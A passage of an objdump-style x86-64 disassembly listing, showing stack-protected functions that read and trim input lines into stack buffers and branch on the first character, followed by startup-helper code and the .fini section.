401bca: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 1045 | 401bd0: 53 push %rbx 1046 | 401bd1: 48 83 ec 10 sub $0x10,%rsp 1047 | 401bd5: 48 89 fb mov %rdi,%rbx 1048 | 401bd8: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1049 | 401bdf: 00 00 1050 | 401be1: 48 89 44 24 08 mov %rax,0x8(%rsp) 1051 | 401be6: 48 8b 15 53 15 20 00 mov 0x201553(%rip),%rdx # 603140 1052 | 401bed: e8 0e f2 ff ff callq 400e00 1053 | 401bf2: 48 89 df mov %rbx,%rdi 1054 | 401bf5: e8 26 f2 ff ff callq 400e20 1055 | 401bfa: 85 c0 test %eax,%eax 1056 | 401bfc: 7e 1f jle 401c1d 1057 | 401bfe: 48 c1 e0 20 shl $0x20,%rax 1058 | 401c02: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1059 | 401c09: ff ff ff 1060 | 401c0c: 48 01 c1 add %rax,%rcx 1061 | 401c0f: 48 c1 f9 20 
sar $0x20,%rcx 1062 | 401c13: 80 3c 0b 0a cmpb $0xa,(%rbx,%rcx,1) 1063 | 401c17: 75 04 jne 401c1d 1064 | 401c19: c6 04 0b 00 movb $0x0,(%rbx,%rcx,1) 1065 | 401c1d: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1066 | 401c24: 00 00 1067 | 401c26: 48 3b 44 24 08 cmp 0x8(%rsp),%rax 1068 | 401c2b: 75 08 jne 401c35 1069 | 401c2d: 31 c0 xor %eax,%eax 1070 | 401c2f: 48 83 c4 10 add $0x10,%rsp 1071 | 401c33: 5b pop %rbx 1072 | 401c34: c3 retq 1073 | 401c35: e8 66 f2 ff ff callq 400ea0 <__stack_chk_fail@plt> 1074 | 401c3a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 1075 | 401c40: 53 push %rbx 1076 | 401c41: 48 81 ec 70 02 00 00 sub $0x270,%rsp 1077 | 401c48: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1078 | 401c4f: 00 00 1079 | 401c51: 48 89 84 24 68 02 00 mov %rax,0x268(%rsp) 1080 | 401c58: 00 1081 | 401c59: bf 52 1f 40 00 mov $0x401f52,%edi 1082 | 401c5e: e8 0d f1 ff ff callq 400d70 1083 | 401c63: 48 8b 15 d6 14 20 00 mov 0x2014d6(%rip),%rdx # 603140 1084 | 401c6a: 48 8d 1c 24 lea (%rsp),%rbx 1085 | 401c6e: be 90 01 00 00 mov $0x190,%esi 1086 | 401c73: 48 89 df mov %rbx,%rdi 1087 | 401c76: e8 85 f1 ff ff callq 400e00 1088 | 401c7b: 48 89 df mov %rbx,%rdi 1089 | 401c7e: e8 9d f1 ff ff callq 400e20 1090 | 401c83: 85 c0 test %eax,%eax 1091 | 401c85: 7e 1f jle 401ca6 1092 | 401c87: 48 c1 e0 20 shl $0x20,%rax 1093 | 401c8b: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1094 | 401c92: ff ff ff 1095 | 401c95: 48 01 c1 add %rax,%rcx 1096 | 401c98: 48 c1 f9 20 sar $0x20,%rcx 1097 | 401c9c: 80 3c 0c 0a cmpb $0xa,(%rsp,%rcx,1) 1098 | 401ca0: 75 04 jne 401ca6 1099 | 401ca2: c6 04 0c 00 movb $0x0,(%rsp,%rcx,1) 1100 | 401ca6: bf 71 1f 40 00 mov $0x401f71,%edi 1101 | 401cab: e8 c0 f0 ff ff callq 400d70 1102 | 401cb0: 48 8b 15 89 14 20 00 mov 0x201489(%rip),%rdx # 603140 1103 | 401cb7: 48 8d 9c 24 00 02 00 lea 0x200(%rsp),%rbx 1104 | 401cbe: 00 1105 | 401cbf: be 64 00 00 00 mov $0x64,%esi 1106 | 401cc4: 48 89 df mov %rbx,%rdi 1107 | 401cc7: e8 34 f1 ff ff callq 400e00 1108 | 401ccc: 48 89 df 
mov %rbx,%rdi 1109 | 401ccf: e8 4c f1 ff ff callq 400e20 1110 | 401cd4: 85 c0 test %eax,%eax 1111 | 401cd6: 7e 27 jle 401cff 1112 | 401cd8: 48 c1 e0 20 shl $0x20,%rax 1113 | 401cdc: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1114 | 401ce3: ff ff ff 1115 | 401ce6: 48 01 c1 add %rax,%rcx 1116 | 401ce9: 48 c1 f9 20 sar $0x20,%rcx 1117 | 401ced: 80 bc 0c 00 02 00 00 cmpb $0xa,0x200(%rsp,%rcx,1) 1118 | 401cf4: 0a 1119 | 401cf5: 75 08 jne 401cff 1120 | 401cf7: c6 84 0c 00 02 00 00 movb $0x0,0x200(%rsp,%rcx,1) 1121 | 401cfe: 00 1122 | 401cff: 80 3c 24 65 cmpb $0x65,(%rsp) 1123 | 401d03: 0f 85 ce 00 00 00 jne 401dd7 1124 | 401d09: bf 7b 1f 40 00 mov $0x401f7b,%edi 1125 | 401d0e: e8 5d f0 ff ff callq 400d70 1126 | 401d13: 48 8b 15 26 14 20 00 mov 0x201426(%rip),%rdx # 603140 1127 | 401d1a: 48 8d 9c 24 90 01 00 lea 0x190(%rsp),%rbx 1128 | 401d21: 00 1129 | 401d22: be 64 00 00 00 mov $0x64,%esi 1130 | 401d27: 48 89 df mov %rbx,%rdi 1131 | 401d2a: e8 d1 f0 ff ff callq 400e00 1132 | 401d2f: 48 89 df mov %rbx,%rdi 1133 | 401d32: e8 e9 f0 ff ff callq 400e20 1134 | 401d37: 85 c0 test %eax,%eax 1135 | 401d39: 7e 27 jle 401d62 1136 | 401d3b: 48 c1 e0 20 shl $0x20,%rax 1137 | 401d3f: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1138 | 401d46: ff ff ff 1139 | 401d49: 48 01 c1 add %rax,%rcx 1140 | 401d4c: 48 c1 f9 20 sar $0x20,%rcx 1141 | 401d50: 80 bc 0c 90 01 00 00 cmpb $0xa,0x190(%rsp,%rcx,1) 1142 | 401d57: 0a 1143 | 401d58: 75 08 jne 401d62 1144 | 401d5a: c6 84 0c 90 01 00 00 movb $0x0,0x190(%rsp,%rcx,1) 1145 | 401d61: 00 1146 | 401d62: bf 88 1f 40 00 mov $0x401f88,%edi 1147 | 401d67: e8 04 f0 ff ff callq 400d70 1148 | 401d6c: 48 8b 15 cd 13 20 00 mov 0x2013cd(%rip),%rdx # 603140 1149 | 401d73: 48 8d 1c 24 lea (%rsp),%rbx 1150 | 401d77: be 90 01 00 00 mov $0x190,%esi 1151 | 401d7c: 48 89 df mov %rbx,%rdi 1152 | 401d7f: e8 7c f0 ff ff callq 400e00 1153 | 401d84: 48 89 df mov %rbx,%rdi 1154 | 401d87: e8 94 f0 ff ff callq 400e20 1155 | 401d8c: 85 c0 test %eax,%eax 
1156 | 401d8e: 7e 1f jle 401daf 1157 | 401d90: 48 c1 e0 20 shl $0x20,%rax 1158 | 401d94: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1159 | 401d9b: ff ff ff 1160 | 401d9e: 48 01 c1 add %rax,%rcx 1161 | 401da1: 48 c1 f9 20 sar $0x20,%rcx 1162 | 401da5: 80 3c 0c 0a cmpb $0xa,(%rsp,%rcx,1) 1163 | 401da9: 75 04 jne 401daf 1164 | 401dab: c6 04 0c 00 movb $0x0,(%rsp,%rcx,1) 1165 | 401daf: 48 8d 1c 24 lea (%rsp),%rbx 1166 | 401db3: 48 89 df mov %rbx,%rdi 1167 | 401db6: e8 65 f0 ff ff callq 400e20 1168 | 401dbb: 48 8d bc 24 00 02 00 lea 0x200(%rsp),%rdi 1169 | 401dc2: 00 1170 | 401dc3: 48 8d b4 24 90 01 00 lea 0x190(%rsp),%rsi 1171 | 401dca: 00 1172 | 401dcb: 48 89 da mov %rbx,%rdx 1173 | 401dce: 89 c1 mov %eax,%ecx 1174 | 401dd0: e8 2b f5 ff ff callq 401300 1175 | 401dd5: eb 6e jmp 401e45 1176 | 401dd7: bf 95 1f 40 00 mov $0x401f95,%edi 1177 | 401ddc: e8 8f ef ff ff callq 400d70 1178 | 401de1: 48 8b 15 58 13 20 00 mov 0x201358(%rip),%rdx # 603140 1179 | 401de8: 48 8d 9c 24 90 01 00 lea 0x190(%rsp),%rbx 1180 | 401def: 00 1181 | 401df0: be 64 00 00 00 mov $0x64,%esi 1182 | 401df5: 48 89 df mov %rbx,%rdi 1183 | 401df8: e8 03 f0 ff ff callq 400e00 1184 | 401dfd: 48 89 df mov %rbx,%rdi 1185 | 401e00: e8 1b f0 ff ff callq 400e20 1186 | 401e05: 85 c0 test %eax,%eax 1187 | 401e07: 7e 27 jle 401e30 1188 | 401e09: 48 c1 e0 20 shl $0x20,%rax 1189 | 401e0d: 48 b9 00 00 00 00 ff movabs $0xffffffff00000000,%rcx 1190 | 401e14: ff ff ff 1191 | 401e17: 48 01 c1 add %rax,%rcx 1192 | 401e1a: 48 c1 f9 20 sar $0x20,%rcx 1193 | 401e1e: 80 bc 0c 90 01 00 00 cmpb $0xa,0x190(%rsp,%rcx,1) 1194 | 401e25: 0a 1195 | 401e26: 75 08 jne 401e30 1196 | 401e28: c6 84 0c 90 01 00 00 movb $0x0,0x190(%rsp,%rcx,1) 1197 | 401e2f: 00 1198 | 401e30: 48 8d bc 24 00 02 00 lea 0x200(%rsp),%rdi 1199 | 401e37: 00 1200 | 401e38: 48 8d b4 24 90 01 00 lea 0x190(%rsp),%rsi 1201 | 401e3f: 00 1202 | 401e40: e8 0b f9 ff ff callq 401750 1203 | 401e45: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 1204 | 401e4c: 00 00 1205 | 
401e4e: 48 3b 84 24 68 02 00 cmp 0x268(%rsp),%rax 1206 | 401e55: 00 1207 | 401e56: 75 0b jne 401e63 1208 | 401e58: 31 c0 xor %eax,%eax 1209 | 401e5a: 48 81 c4 70 02 00 00 add $0x270,%rsp 1210 | 401e61: 5b pop %rbx 1211 | 401e62: c3 retq 1212 | 401e63: e8 38 f0 ff ff callq 400ea0 <__stack_chk_fail@plt> 1213 | 401e68: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 1214 | 401e6f: 00 1215 | 401e70: 41 57 push %r15 1216 | 401e72: 41 89 ff mov %edi,%r15d 1217 | 401e75: 41 56 push %r14 1218 | 401e77: 49 89 f6 mov %rsi,%r14 1219 | 401e7a: 41 55 push %r13 1220 | 401e7c: 49 89 d5 mov %rdx,%r13 1221 | 401e7f: 41 54 push %r12 1222 | 401e81: 4c 8d 25 68 0f 20 00 lea 0x200f68(%rip),%r12 # 602df0 1223 | 401e88: 55 push %rbp 1224 | 401e89: 48 8d 2d 68 0f 20 00 lea 0x200f68(%rip),%rbp # 602df8 1225 | 401e90: 53 push %rbx 1226 | 401e91: 4c 29 e5 sub %r12,%rbp 1227 | 401e94: 31 db xor %ebx,%ebx 1228 | 401e96: 48 c1 fd 03 sar $0x3,%rbp 1229 | 401e9a: 48 83 ec 08 sub $0x8,%rsp 1230 | 401e9e: e8 55 ee ff ff callq 400cf8 1231 | 401ea3: 48 85 ed test %rbp,%rbp 1232 | 401ea6: 74 1e je 401ec6 1233 | 401ea8: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 1234 | 401eaf: 00 1235 | 401eb0: 4c 89 ea mov %r13,%rdx 1236 | 401eb3: 4c 89 f6 mov %r14,%rsi 1237 | 401eb6: 44 89 ff mov %r15d,%edi 1238 | 401eb9: 41 ff 14 dc callq *(%r12,%rbx,8) 1239 | 401ebd: 48 83 c3 01 add $0x1,%rbx 1240 | 401ec1: 48 39 eb cmp %rbp,%rbx 1241 | 401ec4: 75 ea jne 401eb0 1242 | 401ec6: 48 83 c4 08 add $0x8,%rsp 1243 | 401eca: 5b pop %rbx 1244 | 401ecb: 5d pop %rbp 1245 | 401ecc: 41 5c pop %r12 1246 | 401ece: 41 5d pop %r13 1247 | 401ed0: 41 5e pop %r14 1248 | 401ed2: 41 5f pop %r15 1249 | 401ed4: c3 retq 1250 | 401ed5: 66 66 2e 0f 1f 84 00 data16 nopw %cs:0x0(%rax,%rax,1) 1251 | 401edc: 00 00 00 00 1252 | 401ee0: f3 c3 repz retq 1253 | 1254 | Disassembly of section .fini: 1255 | 1256 | 0000000000401ee4 <.fini>: 1257 | 401ee4: 48 83 ec 08 sub $0x8,%rsp 1258 | 401ee8: 48 83 c4 08 add $0x8,%rsp 1259 | 401eec: c3 retq 1260 | 
--------------------------------------------------------------------------------